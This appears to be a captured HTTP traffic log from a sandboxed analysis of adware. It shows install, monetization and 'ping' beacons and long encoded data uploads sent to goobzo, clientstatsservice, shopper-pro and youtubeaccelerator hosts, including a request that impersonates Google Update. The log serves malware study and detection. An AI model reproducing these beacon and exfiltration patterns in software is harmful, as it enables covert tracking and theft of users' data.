    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:01 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1393766667"
    Last-Modified: Sun, 02 Mar 2014 13:24:27 GMT
    Cache-Control: max-age=20297
    Content-Length: 39
    Content-Type: application/json; charset=utf-8
    X-HW: 1401908101.dop013.am4.t,1401908101.cds046.am4.c
    {"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Wed, 04 
    Jun 2014 18:55:01 GMT..Keep-Alive: timeout=10, max=100..Connection: Ke
    ep-Alive..Accept-Ranges: bytes..ETag: "1393766667"..Last-Modified: Sun
    , 02 Mar 2014 13:24:27 GMT..Cache-Control: max-age=20297..Content-Leng
    th: 39..Content-Type: application/json; charset=utf-8..X-HW: 140190810
    1.dop013.am4.t,1401908101.cds046.am4.c..{"update_from_version":"NA","u
    rl":"NA"}..


    GET /online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1 HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.GOOBZO.com
    Pragma: no-cache
    Cookie: ASP.NET_SessionId=gyq3hm5555rtu045g05eee55


    HTTP/1.1 302 Found
    Connection: close
    Date: Wed, 04 Jun 2014 18:55:32 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Location: hXXp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 1264
    <html><head><title>Object moved</title></he
    ad><body>..<h2>Object moved to <a href="hXXp://onlin
    e.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&U
    serID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&O
    S=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,7426140
    9-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&am
    p;PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1">he
    re</a>.</h2>..</body></html>....<!DOCTYPE h
    tml PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org
    /TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://ww
    w.w3.org/1999/xhtml" >..<head><title>...Untitled Page..
    </title></head>..<body>.. <form name="form1" m
    ethod="post" action="ka.aspx?CV=2.0.0.0&ProductID=12000&UserID
    =9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&a
    mp;V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb5
    4-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&Par
    tnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1" id="form1"
    >..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" valu
    e="/wEPDwUJNzgzNDMwNTMzZGTTAuzAluiepn5Ur3p1G7qqvo u/g==" />.. &l
    t;div>.. .. </div>.. </form>..</body>..&
    lt;/html>....

    <<< skipped >>>

    GET /omaha/A411BEAA-C1B6-41C1-96DE-301C4C62F5AD/1/ping.xml?rand=24746 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:13 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399975824"
    Last-Modified: Tue, 13 May 2014 10:10:24 GMT
    Cache-Control: max-age=13772
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908113.dop003.am4.t,1401908113.cds013.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56754"/>. <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    .<event status="ok"/>. </app>.</response>.HTTP/1.1
    200 OK..Date: Wed, 04 Jun 2014 18:55:13 GMT..Keep-Alive: timeout=10, m
    ax=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "139997582
    4"..Last-Modified: Tue, 13 May 2014 10:10:24 GMT..Cache-Control: max-a
    ge=13772..Content-Length: 229..Content-Type: text/xml; charset=UTF-8..
    X-HW: 1401908113.dop003.am4.t,1401908113.cds013.am4.c..<?xml versio
    n="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod
    ">. <daystart elapsed_seconds="56754"/>. <app appid="{43
    0FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. .<event stat
    us="ok"/>. </app>.</response>...


    GET /stats.gif?action=daily&app=35510&bic=92F4CE5DE43B4200BD216411591F0444IE&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908096&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000169&campaign=000169&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=268&bgver=1&pluginsver=133&curtime=1401908096&lifetime=0&rnd=514 HTTP/1.1
    Accept: */*
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: tsWrFyDcz127QSowugh5sgzS aVfE37tICR4vu9QWGwBLum237a0VRiBg1h4BT/jPAagM4srBNI=
    x-amz-request-id: 48B25745F699F44B
    Date: Wed, 04 Jun 2014 18:55:23 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:07 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=0&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=1_26_55&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8397312&asw3=&procstarttime=1401908103&procruntime=2&rnd=1401908105 HTTP/1.1
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: dwCylj6/zUpsQ/2r/cEymk524dOlRvQHUOcnKKzv  5Bec25Wu18hLzpJxeRNBcG8dz5s8YkLaM=
    x-amz-request-id: 9E077B7087D98B3B
    Date: Wed, 04 Jun 2014 18:55:12 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: dwCylj
    6/zUpsQ/2r/cEymk524dOlRvQHUOcnKKzv 5Bec25Wu18hLzpJxeRNBcG8dz5s8YkLaM=
    ..x-amz-request-id: 9E077B7087D98B3B..Date: Wed, 04 Jun 2014 18:55:12
    GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 19
    97 05:00:00 GMT..Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;

    ....



    GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=61&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=1_26_55&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8397312&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908103&procruntime=35&rnd=1401908138 HTTP/1.1

    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: x6yoTmfk jLZbNI V306x3vXOuramfM1gH9qRIQpZdOOFsP0i6OtgcErQGRFZicE6cBMufw2W6w=
    x-amz-request-id: 89142E82F410913F
    Date: Wed, 04 Jun 2014 18:55:43 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=61&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&installtime=1401908103&curtime=1401908103&lifetime=0&silent=1&procstarttime=1401908103&procruntime=35&rnd=1401908138 HTTP/1.1

    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: M39LwQDURqx61JFx5OkG2ucSx132hFZjuwQxRkAUU8TgJe ZXWuR2yyyOTTN37Az5HMhlRA3FNA=
    x-amz-request-id: D9FDAFAE8DDD6482
    Date: Wed, 04 Jun 2014 18:55:44 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: M39LwQ
    DURqx61JFx5OkG2ucSx132hFZjuwQxRkAUU8TgJe ZXWuR2yyyOTTN37Az5HMhlRA3FNA=
    ..x-amz-request-id: D9FDAFAE8DDD6482..Date: Wed, 04 Jun 2014 18:55:44
    GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 19
    97 05:00:00 GMT..Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..


    GET /app/ping.ashx?e=jJl6mEdycnQ 8U9Mk34kw7XExPxaOtUo 0R MP RL3UJOLXkS9L/hwjFxjCJ4rJf9G51DmHdBK7t7iAM5gjoAOfZECWycqr1J2AXz3DUAfeiVKmshyeUoVQbGQSUykHd9w5jaz3mQl4Nllnu1l1OaS3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFawUbmkSx2157cbazn2XuyXlxm8B8dCdJruRo4X6l3lJS VQ0x62ehjDtq1bhwHABa r7NiSQEydOFU5mMfA2YwPKMRKx/Hy aYD1xi6d0GBG/fDcmPtyb/6CnTX MB8zBtIY2WtWIlXvh37zCULcAJjU0tqMnFrjE= HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0
    ....



    GET /app/ping.ashx?e=eFCD8T/coicfJBuEXOGPjV6COREN73glt8f6YpiR28IQ9XpMu3JNON2W/aep YyrKB9qcQmkVohnIGJDPNlC0ZmJRQOaX BeiViAEPFo6Yp/1ErfmLF8//Y1HJKKgNFG88zk3vjcmKQHI/73rKtKuS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VDm/QXz8xtqS6Q9fvZLzhpPHqZTozeGZkFDIYxMHAAwfsy37oES63mGJkwA4PeZyrqoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
    AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Wed, 04 Jun 20
    14 18:54:41 GMT..Content-Length: 0..
    ....



    GET /app/ping.ashx?e=XOxRKBm2zlwfJBuEXOGPjV6COREN73glt8f6YpiR28IQ9XpMu3JNON2W/aep YyrKB9qcQmkVohnIGJDPNlC0ZmJRQOaX BeqUVvKp9Lg9WpU9MRQHad4Zw4LO6ub5l59bC43VoLO9Fqkk05UZLhCDj6H2BIqEzZsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBRirCalL7cUW/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCynVX9FrZDjoUWCdwiLZyE1Pd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0


    GET /app/ping.ashx?e=WVbe3wHlwMFN39k7Xfv8ZYJy6t0jZcn/3Pumfblmu5B9EKWfiY9Pr/lWymhtcc3oSGExqW4qn7xbfNvkjTiX5MYfDaHf3e795OnEgGr9SE8pLMPVU5rYAaQ9fvZLzhpPHqZTozeGZkFDIYxMHAAwfsy37oES63mGl8axoeNMkn46SEXCM79iefveis23DNM6naQQuHaXH0P7e7Z5lK2CBt35bH/eTc70z3EdWN1pnr gmTUgTv 1htN1EBSRfGX1ciiAZ/vb5amGSD/1t3LtazSyzm0szDxlLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBy8ymb4qgtISeTiTeDBaDsYF8DSQNk3h1UhHWwrE8V1N8HrzshzK1L 3T6bhmIsCigFI5wSubXkxw0swgI0gHqEPyWxZkil7pIhSztea6z1Rw== HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.youtubeaccelerator.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: image/gif
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:37 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
    er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
    NET..Date: Wed, 04 Jun 2014 18:55:37 GMT..Content-Length: 0..
    ..
    ..



    GET /app/ping.ashx?e=37A8KpTgCn8 8U9Mk34kw2d IPgbweuc3RDD4M2MKnlkNeKJ xgctdGdqHePycrYlEzjD3RV2P zo7anpTgKuUuWYfM6izmf8Jo6a7hQsoV XTIrvDDxtNQemHjKoviJv6nUSaXbu5kh6O1xoOM2Wwr5wRTDRQspifHi86VNADDPCU8GQVxGgK2dgS8O/TaQhbdsE06OTTBOUDdMBQAxomYsAOzz7hm2v6mMnRFV9GhIj5Qq2ZmLjxaaNW52wnP0R2 KBcqjJpLQObBpEzucPnUWDi3cBRthwZ hsz0Po2FTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PxWwjEc sn2M3eQ9XFbt1hwldgUs5GwsN3teEmMBnHkEwqUveKdtVhw945ujwMCrw90 8ZIB Duyzgolj5eZNKfv3I83DDLqkm2zLBWAsWL HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.youtubeaccelerator.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: image/gif
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:37 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
    er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
    NET..Date: Wed, 04 Jun 2014 18:55:37 GMT..Content-Length: 0..
    ..
    ..



    GET /app/ping.ashx?e=XOxRKBm2zlz43cdm0TeNYqvOUIgADtTZ84gwwF9sRtJdOfUh X e3KWVb3f653Ub2yLvqUuoT2b669uXeODcaUuDZbxKNz6N3xwxIY7FNY4IxcYwieKyX4pPpNLnjc3vsjQeo7Y/37l2kFFoEOzkodWpMxhUIEuT EY/m9JM6zbR1Eo4r5ocnsO0XORzHjel Qi34DV81hm9ABjuVptn8v8ankP8n9dyrKt6FFFGjDmPwcSeTfjP3YwzWtA8HvLhQihwWd1cUa1yd89kh8bQbg K8GXcis4jv1zMzG4ks6u/xtWMdbqt0cTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn52bdmVIAGqWaTBxrOKcJrIKQk8wntVZkQfl0yK7ww8bTUHph4yqL4ib p1Eml27uZIejtcaDjNlsK cEUw0ULKbbG BFpnNiEsykr hf4aEw= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.youtubeaccelerator.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: image/gif
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:42 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
    er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
    NET..Date: Wed, 04 Jun 2014 18:55:42 GMT..Content-Length: 0..


    GET /omaha/06F9C542-63CA-47A4-A81F-3B5E3594D3A6/1/ping.xml?rand=24785 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1400671161"
    Last-Modified: Wed, 21 May 2014 11:19:21 GMT
    Cache-Control: max-age=12573
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908124.dop011.am4.t,1401908124.cds053.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56754"/>. <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    .<event status="ok"/>. </app>.</response>...


    GET /monetization.gif?event=3&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169&app=35510&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908096&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de HTTP/1.1
    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:03 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908103.dop017.am4.t,1401908103.cds019.am4.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 04 Jun 
    2014 18:55:03 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
    live..Accept-Ranges: bytes..ETag: "1344239556"..Last-Modified: Mon, 06
    Aug 2012 07:52:36 GMT..Cache-Control: max-age=86400..Content-Length:
    35..Content-Type: image/gif..X-HW: 1401908103.dop017.am4.t,1401908103.
    cds019.am4.c..GIF89a.............,...........D..;..


    GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=0&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&ElapsedTime=1401908130&SBPIDS=1 HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.GOOBZO.com
    Pragma: no-cache
    Cookie: ASP.NET_SessionId=gyq3hm5555rtu045g05eee55


    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 04 Jun 2014 18:55:34 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 100546
    <RESULT>.<LICENSE><STATUS>YaBhX1FVSUY=</STATUS>
    ;<EXPIRATION>0</EXPIRATION></LICENSE><UPDATE>.
    <EXIST>0</EXIST>.<VERSION></VERSION>.<PAGE_
    URL></PAGE_URL>.<DOWNLOAD_URL></DOWNLOAD_URL>.<
    ;DOWNLOAD_FILENAME></DOWNLOAD_FILENAME>.</UPDATE>.<S
    TATS><COLLECT>1</COLLECT></STATS>.<YTA><
    CONFIG><SITES><LEN>99864</LEN>..<ZIP>0</
    ZIP>..<XMLVERSION>20131113143800</XMLVERSION><DATA&g
    t;..hzmx6NSdzPupSuFmPETTOwEaP5MtN3k5B2a5khhOAdWUsYMpoVIMyJmCvgMilCqVBj
    4UbQPeysvtYNiJVZNbRiQ7kiQsDUsNZ3MEYy1JfoBg o4pFsDooC00NO31pfd X8nXxC3V
    p1HfKOwdgo62mJR71PwoZndR4AVDfbY4 9wFzk5tF 7727dskH5IZvVtCTpSQRswno298p
    arAhgqN6qT czhzLjGJDuSJCwNSw1xwvWc8nan6y8O2JpeHgh8bMQc3Btg097LREoQ8w0F
    1OQktY78pcFTqkKychePn/BkFKYzMvpZMy3oEVdiQxtA5xdCc2YpO8/CTqFCBwPADyfxYv
    2FEVfbbiJm9OYFcu118IHvVTOrVQafL QEq0UE2pvXQCRnwiLKkp2rjL8gdMtEShDzDQXU
    5CS1jvylwVOqQrJyF4 f8Dt4Oelu3aKGRqumrg /iFozngL0PZo7xV IapaBL0J2JDuSJC
    wNSw0svxf0mAsRlmEq8DYMfNoIOuCvQUIqzx3Jp/JaHAbdZcJOoUIHA8AP5qvMAtrk934H
    d6DRXxR/qRhAvBesE3Xujk7yXbEuF7GpHiEFiCgrxFB5bOBLlmCPV7tVm0pUOGtH43b05W
    UQ5y/jTrneLb7G3yjsHYKOtpgOWQYwQw2yOF7cSHoRn1cSqUrhZjxE0zsejhg2EGJPm5Xv
    sdYcwlgFCPIGtJXT5or44D/zrQcOo12lJj5r3ojdmAGFido 37oT3SwxUyBYApR71PwoZn
    dR4AVDfbY4 9zwk5A4Jnge/RPdLDFTIFgCZLLU7dfR VD VN6OwG s/84tOgdW/RrWk0GO
    NPWePfzAC91wf62CJMVfxez40MStk0GONPWePfwyH243G2GPaN L3Yb09J2jjg1O9xFNo7
    LRCtQYSZvjaZZMK3muQBGik0GONPWePfwyH243G2GPaN L3Yb09J2jjg1O9xFNo7Ku

    <<< skipped >>>

    POST /br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=05437b33cd427eacecabaaf96df7a3f9&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
    Host: searchsh.goobzo.com
    Content-Length: 2306
    Connection: Keep-Alive
    Cache-Control: no-cache

    d=noFdkfdc/3Ym7WfeGKPBsM/xQi485RT7e6RltVrmUV/jOXv9GVat9Q96ILFUDdQQ0U07cZCoNXMd7 AwAw4MbCpDupuYvXOFHzdSEwtA2HUxv7ejZK3ip5cWiuaHKZIk/Q/qi5FCnMnRWOH /KsHPWQeXFY RZQv/fEz0FpXNDuFI0MzGYNgLZV/lAguj7HdvEcGxV9hAi/eaCUgojFHoICCyozgiaNk3oyD0 dzL5sfQmO6iO7pDdG5Med87DFf9oadw8nEwYAsRP3mFzUkTCo0GzwT4Co43JjYOidO aLKlf jBBJHtU4bA9PO1Us9xgLLCXqn4BEhq5yXhWXmVyNqTc68XRGFQRTbLmTs6zI5Q5T3dKHf9M1za2UkLERJaswYrguj6HUoISoiyqbB8GccIOPmZ2AoR8nGyAoVtjZuSog8ddU5o wVRfIbcqZWaZaEvLnCwQ7fJh5RlP j1eS0ARKtAad41jWF2u yGMs7 Zrx9yxmCdehiXCZWV7UZXTCcmrHDmcFZAAheLA8YbjzmgLWz7kjWGxdRdK0xdlqKI81uzBmDH3g1yhWCmC0i808TwYL10KFz4RLkq48cNLbC6mIVzxU7lUyfVaZJ95QaW6sa7OQrn6rPO5J7mK1QrhlPGtnwJKJ/gd/DHAQ4rK1ZkPZcqBf6cyuqYdnc0TInBOWlIIk5eqkbM/oPet7hmnLAruQlwKbqr9Si7yPt64zAEPCW3Pn8DsBsX5X1Xe3aKeIsOM5tGPf1uRWx UyL6RZHfLI29H H1l9aZ1NE3eB3qKx yleTrYqB8TiBlngAwAVgCei Oq4X8M91p4Gg7ktN7WedDgv2ey4ijudPfMrI4aNXHKtieG585iOL0zHFnb3RI3bbzMmgkRwLa/J74WZBd2KxyvHg23ZUvZWdezz3VMRyMEibs6JKGz0ZtaViUXwrvmGbVSpBD2V4 pTrqJximJUgVEQ6ztKGLp1Kc/lD0AkVejtP5LcUW S8H3ZHaroBYZ u9sJqVgVDhSNV0UEmc8uSpsFQmwPAAVAQD2pVJzMhJ G0g4HanCFZGrMFxNULV7XOiUlxA16DUz9t
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 0
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:51 GMT


    POST /br.ashx?pid=%s&aid=%s&bur=1&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=30bd13dc44da9e3ff75fb2ebf299b42f&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
    Host: searchsh.goobzo.com
    Content-Length: 2514
    Connection: Keep-Alive
    Pragma: no-cache

